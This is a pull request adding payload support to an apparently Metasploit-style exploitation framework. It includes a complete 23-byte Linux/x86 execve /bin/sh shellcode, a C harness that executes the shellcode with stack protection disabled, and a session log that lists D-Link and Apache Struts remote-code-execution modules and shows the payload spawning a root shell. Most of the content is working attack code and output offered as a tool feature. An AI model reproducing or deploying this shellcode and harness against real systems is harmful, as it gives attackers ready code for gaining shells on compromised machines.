### PR TITLE
add payload features

### DIFF
--- a/lib/base/base.py
+++ b/lib/base/base.py
@@ -47,7 +47,7 @@ class Base(framework.Framework):
                 self.count_auxiliary += 1
             elif 'modules/exploits/' in filename:
                 self.count_exploit += 1
-            elif 'modules/payload/' in filename:
+            elif 'modules/payloads/' in filename:
                 self.count_payload += 1
 
             mod_loadpath = filename.replace(self.mods_path, '')
@@ -271,12 +271,12 @@ class Base(framework.Framework):
             # print module total information
             print(randoms.rand_item_from_iters(colors))
             info = ('       =[ %s v1.00                      ]=\n'
-                    '+ -- --=[ %04d exploits                      ]=-- -- +\n'
                     '+ -- --=[ %04d auxiliary                     ]=-- -- +\n'
+                    '+ -- --=[ %04d exploits                      ]=-- -- +\n'
                     '+ -- --=[ %04d payloads                      ]=-- -- +\n'
                     '+ -- --=[ get more about security !          ]=-- -- +\n'
-                    % (self.app_name, self.count_exploit,
-                       self.count_auxiliary, self.count_payload))
+                    % (self.app_name, self.count_auxiliary,
+                       self.count_exploit, self.count_payload))
             print(info)
             print(framework.Colors.N)
 

--- a/lib/core/payload.py
+++ b/lib/core/payload.py
@@ -1,0 +1,28 @@
+#!/usr/bin/python2
+# -*- coding: utf-8 -*-
+
+##
+# Current source: https://github.com/open-security/Open-Security-Framework/
+##
+
+from lib.base import module
+
+
+class Payload(module.Module):
+    def __init__(self):
+        module.Module.__init__(self)
+        self.shellcode = ''
+
+    def generate_shellcode(self):
+        pass
+
+    def do_generate(self, line):
+        '''generate a payload shellcode'''
+        self.generate_shellcode()
+
+    def help_generate():
+        self.output('')
+        self.output('  Usage :  generate')
+        self.output('  Desp  :  %s' % getattr(self, 'do_generate').__doc__)
+        self.output('  Demo  :  generate')
+        self.output('')

--- a/modules/payloads/linux/x86/bin_sh.py
+++ b/modules/payloads/linux/x86/bin_sh.py
@@ -1,0 +1,79 @@
+#!/usr/bin/python2
+# -*- coding: utf-8 -*-
+
+##
+# Current source: https://github.com/open-security/Open-Security-Framework/
+##
+
+from lib.core import payload
+
+
+class Module(payload.Payload):
+
+    meta = {
+        'name': 'Linux/x86 - execve /bin/sh shellcode',
+        'author': 'B3mB4m',
+        'description': '',
+        'comments': '',
+        'references': [
+            'http://shell-storm.org/shellcode/files/shellcode-827.php'
+        ],
+        'license': '',
+        'options': {
+        }
+    }
+
+    def __init__(self):
+        payload.Payload.__init__(self)
+
+    def format_shellcode_C(self, shellcode):
+        format_c = (
+            "#include <stdio.h>\n"
+            "#include <string.h>\n"
+            "\n"
+            "char *shellcode = \"%s\";\n"
+            "\n"
+            "int main(void){\n"
+            "     fprintf(stdout,\"Length: %%d\\n\",strlen(shellcode));\n"
+            "     (*(void(*)()) shellcode)();\n"
+            "}") % shellcode
+
+        return format_c
+
+    def generate_shellcode(self):
+        """
+        Linux/x86 execve /bin/sh shellcode 23 bytes
+
+        xor    %eax,%eax
+        push   %eax
+        push   $0x68732f2f
+        push   $0x6e69622f
+        mov    %esp,%ebx
+        push   %eax
+        push   %ebx
+        mov    %esp,%ecx
+        mov    $0xb,%al
+        int    $0x80
+
+
+        """
+
+        self.shellcode = r""
+        self.shellcode += r"\x31\xc0"
+        self.shellcode += r"\x50"
+        self.shellcode += r"\x68\x2f\x2f\x73\x68"
+        self.shellcode += r"\x68\x2f\x62\x69\x6e"
+        self.shellcode += r"\x89\xe3"
+        self.shellcode += r"\x50\x53"
+        self.shellcode += r"\x89\xe1"
+        self.shellcode += r"\xb0\x0b"
+        self.shellcode += r"\xcd\x80"
+
+        self.output("----Hex shellcode----")
+        print(self.shellcode)
+        print("\n")
+
+        self.output("----C   shellcode----")
+        print("Compile: gcc -fno-stack-protector -z execstack shellcode.c\n")
+        print(self.format_shellcode_C(self.shellcode))
+        print("\n")


### PR DESCRIPTION
```
vulnpwn > show modules
[*]
[*]     exploits/linux/http/dlink_diagnostic_exec_noauth
[*]     exploits/linux/http/dlink_command_php_unauth_rce
[*]     exploits/multi/http/apache_struts_dmi_rce
[*]     payloads/linux/x86/bin_sh
[*]
vulnpwn > use payloads/linux/x86/bin_sh
vulnpwn (payloads/linux/x86/bin_sh) > generate
[*] ----Hex shellcode----
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80


[*] ----C   shellcode----
Compile: gcc -fno-stack-protector -z execstack shellcode.c

#include <stdio.h>
#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void){
     fprintf(stdout,"Length: %d\n",strlen(shellcode));
     (*(void(*)()) shellcode)();
}

```

It runs ok on Kali i686.

```
root@lab:/tmp# cat shellcode.c
#include <stdio.h>
#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void){
     fprintf(stdout,"Length: %d\n",strlen(shellcode));
      (*(void(*)()) shellcode)();
}
root@lab:/tmp# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@lab:/tmp# ./shellcode
Length: 23
sh-4.3# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.3#
```